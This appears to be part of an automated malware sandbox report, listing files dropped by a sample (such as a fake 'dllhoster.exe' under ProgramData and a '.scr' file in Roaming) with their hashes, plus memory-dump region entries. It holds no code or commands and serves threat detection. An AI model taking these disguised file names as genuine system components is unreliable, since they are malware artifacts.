C:\ProgramData\Systemd\dllhoster.exe

MD5 4c03f40035bf018553157080f1b02671
SHA1 86531b83d3b3317c9da5010357fd9b5fbfd2bebe
SHA256 d1d89ada2bd812473633d6aee4a4e1154affda7d0a5f8e3bf76638701b8c16f9
SHA512 9b20bd124fbce81e562f69c81903f54809ab10206b32b664b19862e8915093fe24a36b0095c3704fd89baca4a7f6fda01a8e3237b33be1efb82f5704080fa926

memory/1488-396-0x00000000001C0000-0x00000000001E0000-memory.dmp

memory/4172-397-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\199b1g.exe

MD5 34e8b12f54a252b5a12eb025a5a4df73
SHA1 8a012adea49ed6a856ca0de339bd56c505a3642c
SHA256 6cb5bef0a752e083ce24830cbd418201220fa6db6298d8f7e0cbd34d10903ac7
SHA512 db9228e8b2cfd49f4371c4aac1bac9787982399c575252910a5aa54e7246907ec4d0c85976f4e258e573ab6703d4c67b04bca59937f4e8e60504ddfa0994014b

memory/4880-400-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\199b1g.exe

MD5 34e8b12f54a252b5a12eb025a5a4df73
SHA1 8a012adea49ed6a856ca0de339bd56c505a3642c
SHA256 6cb5bef0a752e083ce24830cbd418201220fa6db6298d8f7e0cbd34d10903ac7
SHA512 db9228e8b2cfd49f4371c4aac1bac9787982399c575252910a5aa54e7246907ec4d0c85976f4e258e573ab6703d4c67b04bca59937f4e8e60504ddfa0994014b

memory/4976-405-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\test.exe

MD5 bdea822c8b1b29b67a9df071ebac5064
SHA1 507a60469e99c73f4941d2cb1d827ccfcb6fe013
SHA256 4f0f6d48fe06eefbfa03493b6984099ef6b9e1423d128e133a5e8e1353e4ecbd
SHA512 42c0c96b3da105bea5271baf02cb0bfa8a4b0704f1774383b19592e6e84bbd4a29b67f311151b2d5c36b334c484bf3a58aedaac33ff914b3cf68ef4b56d60de5

C:\Users\Admin\AppData\Local\Temp\test.exe

MD5 bdea822c8b1b29b67a9df071ebac5064
SHA1 507a60469e99c73f4941d2cb1d827ccfcb6fe013
SHA256 4f0f6d48fe06eefbfa03493b6984099ef6b9e1423d128e133a5e8e1353e4ecbd
SHA512 42c0c96b3da105bea5271baf02cb0bfa8a4b0704f1774383b19592e6e84bbd4a29b67f311151b2d5c36b334c484bf3a58aedaac33ff914b3cf68ef4b56d60de5

C:\Users\Admin\AppData\Local\Temp\SparestPeculation_2021-09-19_16-22.exe

MD5 9dfcf7fcbab5aa6c1fdecb718f7840ea
SHA1 c6e6043f50475555268124cda0c120f0911c1c38
SHA256 953dd899dedad266fe3d21f1382bd96be78f051ff3d260926c250044a65d4d1d
SHA512 625358f1f7b4012dee0dd09a61abddf47ed830fcf1a065c7c092813546dc53dbfe65b8a7daec63e391cf6ed7505b04dfd252e7f69f332e86e3124efa8ca1d595

C:\Users\Admin\AppData\Local\Temp\SparestPeculation_2021-09-19_16-22.exe

MD5 9dfcf7fcbab5aa6c1fdecb718f7840ea
SHA1 c6e6043f50475555268124cda0c120f0911c1c38
SHA256 953dd899dedad266fe3d21f1382bd96be78f051ff3d260926c250044a65d4d1d
SHA512 625358f1f7b4012dee0dd09a61abddf47ed830fcf1a065c7c092813546dc53dbfe65b8a7daec63e391cf6ed7505b04dfd252e7f69f332e86e3124efa8ca1d595

memory/2644-416-0x000000000041C5DA-mapping.dmp

memory/4880-417-0x000000001AE40000-0x000000001AE42000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\199b1g.exe

MD5 34e8b12f54a252b5a12eb025a5a4df73
SHA1 8a012adea49ed6a856ca0de339bd56c505a3642c
SHA256 6cb5bef0a752e083ce24830cbd418201220fa6db6298d8f7e0cbd34d10903ac7
SHA512 db9228e8b2cfd49f4371c4aac1bac9787982399c575252910a5aa54e7246907ec4d0c85976f4e258e573ab6703d4c67b04bca59937f4e8e60504ddfa0994014b

memory/4172-415-0x0000000004CC0000-0x00000000051BE000-memory.dmp

memory/2644-427-0x0000000005760000-0x0000000005D66000-memory.dmp

memory/4792-428-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\7974777.scr

MD5 87ab55c2316e05567d9c45f77028da15
SHA1 8a159e4b3afda505bb1b4665b2be856d5804cfea
SHA256 fc9887d5ba7add7ea1b487e58f0a5495adfe833cf1e75067edec2a1dce49df20
SHA512 3fca98782e50c9a77ac93c8d934c36cd77612381884cc0fd913e255016998271b993819b841ba0bfc19f89cf0302d895d884158e8d776c8f85b61b03a0f0ad16

C:\Users\Admin\AppData\Roaming\7974777.scr

MD5 87ab55c2316e05567d9c45f77028da15
SHA1 8a159e4b3afda505bb1b4665b2be856d5804cfea
SHA256 fc9887d5ba7add7ea1b487e58f0a5495adfe833cf1e75067edec2a1dce49df20
SHA512 3fca98782e50c9a77ac93c8d934c36cd77612381884cc0fd913e255016998271b993819b841ba0bfc19f89cf0302d895d884158e8d776c8f85b61b03a0f0ad16

memory/4976-440-0x0000000000400000-0x0000000000460000-memory.dmp

memory/4976-442-0x0000000004C90000-0x0000000004C91000-memory.dmp

memory/4976-438-0x0000000000580000-0x00000000006CA000-memory.dmp

memory/4976-446-0x0000000004C92000-0x0000000004C93000-memory.dmp

memory/4976-448-0x0000000004C93000-0x0000000004C94000-memory.dmp

memory/4976-443-0x0000000004C94000-0x0000000004C96000-memory.dmp

memory/4792-452-0x0000000004970000-0x0000000004971000-memory.dmp

memory/1488-466-0x0000000001110000-0x0000000001130000-memory.dmp